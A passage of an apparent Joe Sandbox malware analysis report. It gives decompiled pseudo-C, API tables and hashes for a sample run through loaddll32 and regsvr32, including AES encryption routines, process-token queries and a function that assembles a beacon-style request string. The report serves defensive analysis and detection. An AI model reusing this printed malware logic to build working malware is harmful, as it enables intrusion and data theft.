					_t24 = _t23 + _a16 * 2;
					 *_t24 =  *_t24 & 0x00000000;
					_t20 = E010C15E6(__ecx, _a4, _a8, _t23);
					if(_t20 == 0) {
						GetSystemTimeAsFileTime( &_v12);
						 *_t24 = 0x5f;
						_t20 = E010C5B98(_t22, _a4, 0x80000001, _a8, _t23,  &_v12, 8);
					}
					HeapFree( *0x10ca2d8, 0, _t23);
				}
				return _t20;
			}









                    0x010c5231
                    0x010c5242
                    0x010c5246
                    0x010c529f
                    0x010c5248
                    0x010c524f
                    0x010c5255
                    0x010c525e
                    0x010c5262
                    0x010c5268
                    0x010c5278
                    0x010c528a
                    0x010c528a
                    0x010c5295
                    0x010c5295
                    0x010c52a6

                    APIs
                      • Part of subcall function 010C5406: lstrlen.KERNEL32(?,00000000,037A9D58,00000000,010C3C77,037A9F7B,69B25F44,?,?,?,?,69B25F44,00000005,010CA00C,4D283A53,?), ref: 010C540D
                      • Part of subcall function 010C5406: mbstowcs.NTDLL ref: 010C5436
                      • Part of subcall function 010C5406: memset.NTDLL ref: 010C5448
                    • GetSystemTimeAsFileTime.KERNEL32(004F0053,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,037A93CC), ref: 010C5268
                    • HeapFree.KERNEL32(00000000,00000000,004F0053,00000014,00000000,00000008,00000000,74E05520,00000008,00000014,004F0053,037A93CC), ref: 010C5295
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: Time$FileFreeHeapSystemlstrlenmbstowcsmemset
                    • String ID: Ut
                    • API String ID: 1500278894-8415677
                    • Opcode ID: a7054991b0f2ab859746a8a5528d7ac52525a858d9e938a206a68739b64f6cb8
                    • Instruction ID: 553c06c57c329264ccc6cbd0b675b5c3eca0719181e4938fde510235aef38c9d
                    • Opcode Fuzzy Hash: a7054991b0f2ab859746a8a5528d7ac52525a858d9e938a206a68739b64f6cb8
                    • Instruction Fuzzy Hash: AC018F3620020ABFDB215F98DC44F9E7FB9FB85B04F104029FA8096191EB72E915DB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C395B Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 58%
                    			E010C395B(void* __eax, void* __ecx, void* _a4, void** _a8, intOrPtr* _a12) {
				intOrPtr* _v8;
				void* _t17;
				intOrPtr* _t22;
				void* _t27;
				char* _t30;
				void* _t33;
				void* _t34;
				void* _t36;
				void* _t37;
				void* _t39;
				int _t42;

				_t17 = __eax;
				_t37 = 0;
				__imp__(_a4, _t33, _t36, _t27, __ecx);
				_t2 = _t17 + 1; // 0x1
				_t28 = _t2;
				_t34 = E010C63FD(_t2);
				if(_t34 != 0) {
					_t30 = E010C63FD(_t28);
					if(_t30 == 0) {
						E010C17AB(_t34);
					} else {
						_t39 = _a4;
						_t22 = E010C799A(_t39);
						_v8 = _t22;
						if(_t22 == 0 ||  *_t22 !=  *((intOrPtr*)(_t22 + 1))) {
							_a4 = _t39;
						} else {
							_t26 = _t22 + 2;
							_a4 = _t22 + 2;
							_t22 = E010C799A(_t26);
							_v8 = _t22;
						}
						if(_t22 == 0) {
							__imp__(_t34, _a4);
							 *_t30 = 0x2f;
							 *((char*)(_t30 + 1)) = 0;
						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                    0x010c395b
                    0x010c3965
                    0x010c3967
                    0x010c396d
                    0x010c396d
                    0x010c3976
                    0x010c397a
                    0x010c3986
                    0x010c398a
                    0x010c39fe
                    0x010c398c
                    0x010c398c
                    0x010c3990
                    0x010c3997
                    0x010c399a
                    0x010c39b4
                    0x010c39a3
                    0x010c39a3
                    0x010c39a7
                    0x010c39aa
                    0x010c39af
                    0x010c39af
                    0x010c39b9
                    0x010c39e1
                    0x010c39e7
                    0x010c39ea
                    0x010c39bb
                    0x010c39bd
                    0x010c39c5
                    0x010c39d0
                    0x010c39d5
                    0x010c39d5
                    0x010c39f1
                    0x010c39f8
                    0x010c39f9
                    0x010c39f9
                    0x010c398a
                    0x010c3a09

                    APIs
                    • lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,010C43F7,?,?,?,?,00000102,010C1AE3,?,?,00000000), ref: 010C3967
                      • Part of subcall function 010C63FD: RtlAllocateHeap.NTDLL(00000000,00000000,010C28D5), ref: 010C6409
                      • Part of subcall function 010C799A: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,010C3995,00000000,00000001,00000001,?,?,010C43F7,?,?,?,?,00000102), ref: 010C79A8
                      • Part of subcall function 010C799A: StrChrA.SHLWAPI(?,0000003F,?,?,010C43F7,?,?,?,?,00000102,010C1AE3,?,?,00000000,00000000), ref: 010C79B2
                    • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,010C43F7,?,?,?,?,00000102,010C1AE3,?), ref: 010C39C5
                    • lstrcpy.KERNEL32(00000000,00000000), ref: 010C39D5
                    • lstrcpy.KERNEL32(00000000,00000000), ref: 010C39E1
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                    • String ID:
                    • API String ID: 3767559652-0
                    • Opcode ID: 0b9bcdfa31dcfbca1dee610e316ed6cc77882b5518cf843431a7745e996c093f
                    • Instruction ID: 4d242e30e20ccb23ab0bf9ef50fd3878b69d61b4f92b1901d987b0e3968f0cba
                    • Opcode Fuzzy Hash: 0b9bcdfa31dcfbca1dee610e316ed6cc77882b5518cf843431a7745e996c093f
                    • Instruction Fuzzy Hash: D721A272500256EFCB129F68C884AEEBFF8FF15A44F058098F9899F201D635C900CFA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C114D Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E010C114D(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E010C63FD(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                    0x010c1162
                    0x010c1166
                    0x010c1170
                    0x010c1177
                    0x010c117a
                    0x010c117c
                    0x010c1184
                    0x010c1189
                    0x010c1197
                    0x010c119c
                    0x010c11a6

                    APIs
                    • lstrlenW.KERNEL32(004F0053,?,74E05520,00000008,037A93CC,?,010C3418,004F0053,037A93CC,?,?,?,?,?,?,010C54F9), ref: 010C115D
                    • lstrlenW.KERNEL32(010C3418,?,010C3418,004F0053,037A93CC,?,?,?,?,?,?,010C54F9), ref: 010C1164
                      • Part of subcall function 010C63FD: RtlAllocateHeap.NTDLL(00000000,00000000,010C28D5), ref: 010C6409
                    • memcpy.NTDLL(00000000,004F0053,74E069A0,?,?,010C3418,004F0053,037A93CC,?,?,?,?,?,?,010C54F9), ref: 010C1184
                    • memcpy.NTDLL(74E069A0,010C3418,00000002,00000000,004F0053,74E069A0,?,?,010C3418,004F0053,037A93CC), ref: 010C1197
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: lstrlenmemcpy$AllocateHeap
                    • String ID:
                    • API String ID: 2411391700-0
                    • Opcode ID: 85d4136b519fc6635971de64a92205bebc89d57a5ba338ffd46573b17d57664c
                    • Instruction ID: 9828c01a5df7b47b2feed752312ef2a82261f6264cae7dff67042411cef9acb7
                    • Opcode Fuzzy Hash: 85d4136b519fc6635971de64a92205bebc89d57a5ba338ffd46573b17d57664c
                    • Instruction Fuzzy Hash: 4DF03C72900119FB8F11DFA8CC44CDF7BECEF18254B114066A908D7201E671EA148FA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 010C252A Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                    Download Yara Rule
                    APIs
                    • lstrlen.KERNEL32(037A9B50,00000000,00000000,7691C740,010C6AE6,00000000), ref: 010C253A
                    • lstrlen.KERNEL32(?), ref: 010C2542
                      • Part of subcall function 010C63FD: RtlAllocateHeap.NTDLL(00000000,00000000,010C28D5), ref: 010C6409
                    • lstrcpy.KERNEL32(00000000,037A9B50), ref: 010C2556
                    • lstrcat.KERNEL32(00000000,?), ref: 010C2561
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmpDownload File
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                    • String ID:
                    • API String ID: 74227042-0
                    • Opcode ID: 00182d90d118327e911d7bf7d9485105da8e4e76ec81fa4bbbdd263ff561dead
                    • Instruction ID: bd28afd0fe2a53df1810600cccc6f5ed5365d536664ab39cca3bf13b8e19aac5
                    • Opcode Fuzzy Hash: 00182d90d118327e911d7bf7d9485105da8e4e76ec81fa4bbbdd263ff561dead
                    • Instruction Fuzzy Hash: 22E09B735011619F87215BE89C48C9FBBACFF99710704045AF680D3104C72A8801CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Executed Functions

                    Function 04F94872 Relevance: 19.7, APIs: 13, Instructions: 163encryptionCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 135 4f94872-4f948b2 CryptAcquireContextW 136 4f94a09-4f94a0f GetLastError 135->136 137 4f948b8-4f948f4 memcpy CryptImportKey 135->137 138 4f94a12-4f94a19 136->138 139 4f948fa-4f9490c CryptSetKeyParam 137->139 140 4f949f4-4f949fa GetLastError 137->140 142 4f949e0-4f949e6 GetLastError 139->142 143 4f94912-4f9491b 139->143 141 4f949fd-4f94a07 CryptReleaseContext 140->141 141->138 146 4f949e9-4f949f2 CryptDestroyKey 142->146 144 4f9491d-4f9491f 143->144 145 4f94923-4f94930 call 4f963fd 143->145 144->145 147 4f94921 144->147 150 4f949d7-4f949de 145->150 151 4f94936-4f9493f 145->151 146->141 147->145 150->146 152 4f94942-4f9494a 151->152 153 4f9494c 152->153 154 4f9494f-4f9496c memcpy 152->154 153->154 155 4f9496e-4f94985 CryptEncrypt 154->155 156 4f94987-4f94996 CryptDecrypt 154->156 157 4f9499c-4f9499e 155->157 156->157 158 4f949ae-4f949b9 GetLastError 157->158 159 4f949a0-4f949aa 157->159 161 4f949bb-4f949cb 158->161 162 4f949cd-4f949d5 call 4f917ab 158->162 159->152 160 4f949ac 159->160 160->161 161->146 162->146
                    C-Code - Quality: 58%
                    			E04F94872(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				int _v8;
				long* _v12;
				int _v16;
				BYTE* _v20;
				long* _v24;
				void* _v39;
				char _v40;
				void _v56;
				int _v60;
				intOrPtr _v64;
				void _v67;
				char _v68;
				void* _t61;
				int _t68;
				signed int _t76;
				int _t79;
				int _t81;
				int _t85;
				long _t86;
				int _t90;
				signed int _t94;
				int _t101;
				BYTE* _t102;
				int _t103;
				void* _t104;
				void* _t105;
				void* _t106;

				_t103 = __eax;
				_t94 = 6;
				_v68 = 0;
				memset( &_v67, 0, _t94 << 2);
				_t105 = _t104 + 0xc;
				asm("stosw");
				asm("stosb");
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				asm("stosb");
				_t61 =  *0x4f9a0e4( &_v24, 0, 0, 0x18, 0xf0000000); // executed
				if(_t61 == 0) {
					_a8 = GetLastError();
				} else {
					_t101 = 0x10;
					memcpy( &_v56, _a8, _t101);
					_t106 = _t105 + 0xc;
					_v60 = _t101;
					_v67 = 2;
					_v64 = 0x660e;
					_v68 = 8;
					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
					if(_t68 == 0) {
						_a8 = GetLastError();
					} else {
						_push(0);
						_push( &_v40);
						_push(1);
						_push(_v12);
						if( *0x4f9a0c4() == 0) {
							_a8 = GetLastError();
						} else {
							_t18 = _t103 + 0xf; // 0x11f
							_t76 = _t18 & 0xfffffff0;
							if(_a4 != 0 && _t76 == _t103) {
								_t76 = _t76 + _t101;
							}
							_t102 = E04F963FD(_t76);
							_v20 = _t102;
							if(_t102 == 0) {
								_a8 = 8;
							} else {
								_v16 = 0;
								_a8 = 0;
								while(1) {
									_t79 = 0x10;
									_v8 = _t79;
									if(_t103 <= _t79) {
										_v8 = _t103;
									}
									memcpy(_t102, _a12, _v8);
									_t81 = _v8;
									_a12 = _a12 + _t81;
									_t103 = _t103 - _t81;
									_t106 = _t106 + 0xc;
									if(_a4 == 0) {
										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
									} else {
										_t85 =  *0x4f9a0c8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
									}
									if(_t85 == 0) {
										break;
									}
									_t90 = _v8;
									_v16 = _v16 + _t90;
									_t102 =  &(_t102[_t90]);
									if(_t103 != 0) {
										continue;
									} else {
										L17:
										 *_a16 = _v20;
										 *_a20 = _v16;
									}
									goto L21;
								}
								_t86 = GetLastError();
								_a8 = _t86;
								if(_t86 != 0) {
									E04F917AB(_v20);
								} else {
									goto L17;
								}
							}
						}
						L21:
						CryptDestroyKey(_v12);
					}
					CryptReleaseContext(_v24, 0);
				}
				return _a8;
			}






























                    0x04f9487b
                    0x04f94881
                    0x04f94884
                    0x04f9488a
                    0x04f9488a
                    0x04f9488c
                    0x04f9488e
                    0x04f94891
                    0x04f94897
                    0x04f94898
                    0x04f94899
                    0x04f9489f
                    0x04f948a4
                    0x04f948aa
                    0x04f948b2
                    0x04f94a0f
                    0x04f948b8
                    0x04f948ba
                    0x04f948c3
                    0x04f948c8
                    0x04f948da
                    0x04f948dd
                    0x04f948e1
                    0x04f948e8
                    0x04f948ec
                    0x04f948f4
                    0x04f949fa
                    0x04f948fa
                    0x04f948fa
                    0x04f948fe
                    0x04f948ff
                    0x04f94901
                    0x04f9490c
                    0x04f949e6
                    0x04f94912
                    0x04f94912
                    0x04f94915
                    0x04f9491b
                    0x04f94921
                    0x04f94921
                    0x04f94929
                    0x04f9492d
                    0x04f94930
                    0x04f949d7
                    0x04f94936
                    0x04f9493c
                    0x04f9493f
                    0x04f94942
                    0x04f94944
                    0x04f94947
                    0x04f9494a
                    0x04f9494c
                    0x04f9494c
                    0x04f94956
                    0x04f9495b
                    0x04f9495e
                    0x04f94961
                    0x04f94963
                    0x04f9496c
                    0x04f94996
                    0x04f9496e
                    0x04f9497f
                    0x04f9497f
                    0x04f9499e
                    0x00000000
                    0x00000000
                    0x04f949a0
                    0x04f949a3
                    0x04f949a6
                    0x04f949aa
                    0x00000000
                    0x04f949ac
                    0x04f949bb
                    0x04f949c1
                    0x04f949c9
                    0x04f949c9
                    0x00000000
                    0x04f949aa
                    0x04f949ae
                    0x04f949b6
                    0x04f949b9
                    0x04f949d0
                    0x00000000
                    0x00000000
                    0x00000000
                    0x04f949b9
                    0x04f94930
                    0x04f949e9
                    0x04f949ec
                    0x04f949ec
                    0x04f94a01
                    0x04f94a01
                    0x04f94a19

                    APIs
                    • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,?,00000110,04F93AC6), ref: 04F948AA
                    • memcpy.NTDLL(?,04F93AC6,00000010,?,?,?,?,?,?,?,?,?,?,04F960F5,00000000,04F94DD9), ref: 04F948C3
                    • CryptImportKey.ADVAPI32(00000000,?,0000001C,00000000,00000000,?), ref: 04F948EC
                    • CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 04F94904
                    • memcpy.NTDLL(00000000,04F94DD9,04F93AC6,0000011F), ref: 04F94956
                    • CryptEncrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,04F93AC6,00000020,?,?,0000011F), ref: 04F9497F
                    • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,04F93AC6,?,?,0000011F), ref: 04F94996
                    • GetLastError.KERNEL32(?,?,0000011F), ref: 04F949AE
                    • GetLastError.KERNEL32 ref: 04F949E0
                    • CryptDestroyKey.ADVAPI32(?), ref: 04F949EC
                    • GetLastError.KERNEL32 ref: 04F949F4
                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 04F94A01
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,04F960F5,00000000,04F94DD9,04F93AC6,?,04F93AC6), ref: 04F94A09
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                    • String ID:
                    • API String ID: 1967744295-0
                    • Opcode ID: 0760b87e35a85635e67a116f31595b7ba4717bdd1f5d1d471538f1f2f2e65814
                    • Instruction ID: 295b937aa2cad01695c0702c2d98ca8f788dae6f4de99cd5f128a76facad37f5
                    • Opcode Fuzzy Hash: 0760b87e35a85635e67a116f31595b7ba4717bdd1f5d1d471538f1f2f2e65814
                    • Instruction Fuzzy Hash: B5515B72D04208BFEF11DFA9DC84AAEBBF8EB44354F004429F915E6250E774AE56DB21
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F977BB Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 38%
                    			E04F977BB(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E04F963FD(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E04F917AB(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                    0x04f977c8
                    0x04f977c9
                    0x04f977ca
                    0x04f977cb
                    0x04f977cc
                    0x04f977d0
                    0x04f977d7
                    0x04f977e6
                    0x04f977e9
                    0x04f977ec
                    0x04f977f3
                    0x04f977f6
                    0x04f977f9
                    0x04f977fc
                    0x04f977ff
                    0x04f9780a
                    0x04f9780c
                    0x04f97815
                    0x04f9781d
                    0x04f9781f
                    0x04f97831
                    0x04f9783b
                    0x04f9783f
                    0x04f9784e
                    0x04f97852
                    0x04f9785b
                    0x04f97863
                    0x04f97863
                    0x04f97865
                    0x04f97865
                    0x04f9786d
                    0x04f97873
                    0x04f97877
                    0x04f97877
                    0x04f97882

                    APIs
                    • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04F97802
                    • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04F97815
                    • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04F97831
                      • Part of subcall function 04F963FD: RtlAllocateHeap.NTDLL(00000000,00000000,04F928D5), ref: 04F96409
                    • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 04F9784E
                    • memcpy.NTDLL(?,00000000,0000001C), ref: 04F9785B
                    • NtClose.NTDLL(?), ref: 04F9786D
                    • NtClose.NTDLL(00000000), ref: 04F97877
                    Memory Dump Source
                    • Source File: 00000005.00000002.811821037.0000000004F91000.00000020.00020000.sdmp, Offset: 04F90000, based on PE: true
                    • Associated: 00000005.00000002.811796688.0000000004F90000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811875755.0000000004F99000.00000002.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811901442.0000000004F9A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000005.00000002.811997243.0000000004F9C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_5_2_4f90000_regsvr32.jbxd
                    Similarity
                    • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                    • String ID:
                    • API String ID: 2575439697-0
                    • Opcode ID: 05f948c14960dc5980446c69418f8fa957a41e9f0651f436bb2851aa886a6065
                    • Instruction ID: 419861077e293ee5034bb9786067033ae499ea32fa6a758f91e8c5b7c4fa37f1
                    • Opcode Fuzzy Hash: 05f948c14960dc5980446c69418f8fa957a41e9f0651f436bb2851aa886a6065
                    • Instruction Fuzzy Hash: C921E7B291021CBBEF01AF95DC45EDEBFBDEB08740F104066F905A6260D7B19E45DBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04F968EB Relevance: 44.0, APIs: 24, Strings: 1, Instructions: 214memorystringCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 68%
                    			E04F968EB(long __eax, void* __edx, intOrPtr _a12, void* _a16, void* _a20, intOrPtr _a24) {
				intOrPtr _v0;
				intOrPtr _v4;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v52;
				void* __ecx;
				void* __edi;
				long _t29;
				intOrPtr _t30;
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				void* _t37;
				intOrPtr _t38;
				int _t41;
				void* _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t54;
				intOrPtr _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t66;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t82;
				int _t85;
				intOrPtr _t87;
				int _t90;
				intOrPtr _t92;
				int _t95;
				intOrPtr* _t97;
				intOrPtr* _t98;
				void* _t99;
				void* _t103;
				void* _t104;
				void* _t105;
				intOrPtr _t106;
				void* _t108;
				int _t109;
				void* _t110;
				void* _t111;
				void* _t113;
				void* _t114;
				void* _t116;

				_t103 = __edx;
				_t29 = __eax;
				_t113 = _a20;
				_v4 = 8;
				if(__eax == 0) {
					_t29 = GetTickCount();
				}
				_t30 =  *0x4f9a018; // 0x3639fe1b
				asm("bswap eax");
				_t31 =  *0x4f9a014; // 0x3a87c8cd
				asm("bswap eax");
				_t32 =  *0x4f9a010; // 0xd8d2f808
				asm("bswap eax");
				_t33 =  *0x4f9a00c; // 0xeec43f25
				asm("bswap eax");
				_t34 =  *0x4f9a320; // 0xb2d5a8
				_t3 = _t34 + 0x4f9b633; // 0x74666f73
				_t109 = wsprintfA(_t113, _t3, 2, 0x3d170, _t33, _t32, _t31, _t30,  *0x4f9a02c,  *0x4f9a004, _t29);
				_t37 = E04F94B2C();
				_t38 =  *0x4f9a320; // 0xb2d5a8
				_t4 = _t38 + 0x4f9b673; // 0x74707526
				_t41 = wsprintfA(_t109 + _t113, _t4, _t37);
				_t116 = _t114 + 0x38;
				_t110 = _t109 + _t41;
				if(_a24 != 0) {
					_t92 =  *0x4f9a320; // 0xb2d5a8
					_t8 = _t92 + 0x4f9b67e; // 0x732526
					_t95 = wsprintfA(_t110 + _t113, _t8, _a24);
					_t116 = _t116 + 0xc;
					_t110 = _t110 + _t95; // executed
				}
				_t42 = E04F9256F(_t99); // executed
				_t104 = _t42;
				if(_t104 != 0) {
					_t87 =  *0x4f9a320; // 0xb2d5a8
					_t10 = _t87 + 0x4f9b8d4; // 0x736e6426
					_t90 = wsprintfA(_t110 + _t113, _t10, _t104);
					_t116 = _t116 + 0xc;
					_t110 = _t110 + _t90;
					HeapFree( *0x4f9a2d8, 0, _t104);
				}
				_t105 = E04F94B71();
				if(_t105 != 0) {
					_t82 =  *0x4f9a320; // 0xb2d5a8
					_t12 = _t82 + 0x4f9b8dc; // 0x6f687726
					_t85 = wsprintfA(_t110 + _t113, _t12, _t105);
					_t116 = _t116 + 0xc;
					_t110 = _t110 + _t85;
					HeapFree( *0x4f9a2d8, 0, _t105);
				}
				_t106 =  *0x4f9a3cc; // 0x5ac95b0
				_a24 = E04F97729(0x4f9a00a, _t106 + 4);
				_t46 =  *0x4f9a36c; // 0x0
				if(_t46 != 0) {
					_t78 =  *0x4f9a320; // 0xb2d5a8
					_t15 = _t78 + 0x4f9b8b6; // 0x3d736f26
					_t81 = wsprintfA(_t110 + _t113, _t15, _t46);
					_t116 = _t116 + 0xc;
					_t110 = _t110 + _t81;
				}
				_t47 =  *0x4f9a368; // 0x0
				if(_t47 != 0) {
					_t75 =  *0x4f9a320; // 0xb2d5a8
					_t17 = _t75 + 0x4f9b88d; // 0x3d706926
					wsprintfA(_t110 + _t113, _t17, _t47);
				}
				if(_a24 != 0) {
					_t108 = RtlAllocateHeap( *0x4f9a2d8, 0, 0x800);
					if(_t108 != 0) {
						E04F953EC(GetTickCount());
						_t54 =  *0x4f9a3cc; // 0x5ac95b0
						__imp__(_t54 + 0x40);
						asm("lock xadd [eax], ecx");
						_t58 =  *0x4f9a3cc; // 0x5ac95b0
						__imp__(_t58 + 0x40);
						_t60 =  *0x4f9a3cc; // 0x5ac95b0
						_t61 = E04F918BA(1, _t103, _t113,  *_t60); // executed
						_t111 = _t61;
						asm("lock xadd [eax], ecx");
						if(_t111 != 0) {
							StrTrimA(_t111, 0x4f9928c);
							_push(_t111);
							_t66 = E04F9252A();
							_a12 = _t66;
							if(_t66 != 0) {
								_t97 = __imp__;
								 *_t97(_t111, _v0);
								 *_t97(_t108, _v4);
								_t98 = __imp__;
								 *_t98(_t108, _v0);
								 *_t98(_t108, _t111);
								_t72 = E04F91AA2(0xffffffffffffffff, _t108, _v24, _v20); // executed
								_v52 = _t72;
								if(_t72 != 0 && _t72 != 0x10d2) {
									E04F95F6A();
								}
								HeapFree( *0x4f9a2d8, 0, _v16);
							}
							HeapFree( *0x4f9a2d8, 0, _t111);
						}
						RtlFreeHeap( *0x4f9a2d8, 0, _t108); // executed
					}
					HeapFree( *0x4f9a2d8, 0, _a16);
				}
				HeapFree( *0x4f9a2d8, 0, _t113);
				return _a12;
			}




















































                    0x04f968eb
                    0x04f968eb
                    0x04f968f1
                    0x04f968f7
                    0x04f968ff
                    0x04f96901
                    0x04f96901
                    0x04f9690e
                    0x04f96919
                    0x04f9691c
                    0x04f96927
                    0x04f9692a
                    0x04f9692f
                    0x04f96932
                    0x04f96937
                    0x04f9693a
                    0x04f96946
                    0x04f96953
                    0x04f96955
                    0x04f9695b
                    0x04f96960
